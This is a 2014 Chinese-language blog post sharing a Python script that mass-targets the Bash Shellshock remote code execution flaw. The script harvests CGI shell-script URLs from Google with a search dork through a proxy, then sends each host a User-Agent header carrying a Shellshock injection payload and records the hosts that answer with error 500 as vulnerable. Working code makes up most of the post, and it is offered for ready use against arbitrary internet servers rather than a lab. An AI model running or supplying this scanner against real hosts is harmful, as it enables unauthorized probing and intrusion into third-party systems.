Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
来源:程序员人生 发布时间:2014-10-12 18:14:12 阅读次数:3140次
Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何检测漏洞思路也很简单,我这里直接根据服务器返回码进行判断的。
思路就是以上这些,下面还是和往常一样,贴代码:
#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []
class GoogleURLProvider():
def __init__(self,pageCount,proxies):
self.pageCount = pageCount #查询的页数
self.keywords = r'inurl:cgi-bin filetype:sh'
self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
self.proxies = proxies
def getRequest(self,url):
return requests.get(url,proxies=self.proxies,verify=False)
def getUrls(self):
ret_list = []
tmp_list = []
for x in xrange(0,self.pageCount):
url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
try:
r = self.getRequest(url)
results = json.loads(r.text)
if not results:
continue
infos = results['responseData']['results']
if infos:
for i in infos:
tmp_list.append(i['url'])
except Exception, e:
continue
ret_list = ret_list + tmp_list
return ret_list
class BashRCEDetector():
def __init__(self,urls):
self.urls = urls
def detector(self):
global vul_res
for x in self.urls:
#多线程执行
each = EachWorker(x)
each.start()
each.join()
'''线程工作类'''
class EachWorker(threading.Thread):
def __init__(self,url):
threading.Thread.__init__(self)
self.url = url
def run(self):
global vul_res
useragent_header = {
'User-Agent':'''() { 1;}; echo 'eee'''
}
try:
r = requests.get(self.url,headers = useragent_header,timeout=8)
if r.status_code == 500:
print "{url} has Bash RCE vulnerability".format(url=self.url)
vul_res.append(self.url)
else:
pass
except socket.timeout, e:
pass
except requests.exceptions.Timeout, e:
pass
except requests.exceptions.ConnectionError, e:
pass
if __name__ == '__main__':
print 'Powered by:Exploit QQ:739858341'
print 'This is a program which you can use to scan the BashRCE vulnerability
Scanner working,please wait....'
if len(sys.argv) != 2:
print 'Usage:python BashRCEScanner <google pageCount>'
sys.exit()
#goagent proxy
#在这里修改,加入你自己的代理即可使用
proxies = {
'http':"http://127.0.0.1:8087",
'https':"http://127.0.0.1:8087"
}
url_res = []
vul_guys = []
urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
url_res = urlgetter.getUrls()
bash_detector = BashRCEDetector(url_res)
bash_detector.detector()
if len(vul_res) == 0:
print 'This group have no vulnerability'
else:
print 'Find %d poor host(s)' % len(vul_res)
运行截图:
生活不易,码农辛苦
如果您觉得本网站对您的学习有所帮助,可以手机扫描二维码进行捐赠
